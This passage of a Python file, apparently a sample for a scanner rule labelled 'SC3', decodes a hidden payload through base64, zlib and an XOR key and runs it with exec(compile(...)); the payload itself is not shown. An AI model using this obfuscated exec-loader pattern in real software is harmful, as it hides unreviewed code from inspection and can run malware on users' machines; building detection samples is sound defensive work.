9+t//71cuFYMo63UN69cTOIrHfo25p+NSG70Dmg+5XEVb1sCrHCaF7erwdY6Bq/rseiwOqp7j4957lqMj/FDSdf/36DagGOu0="
_K = bytes.fromhex("45c4558c0d03efbea2a964f3")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
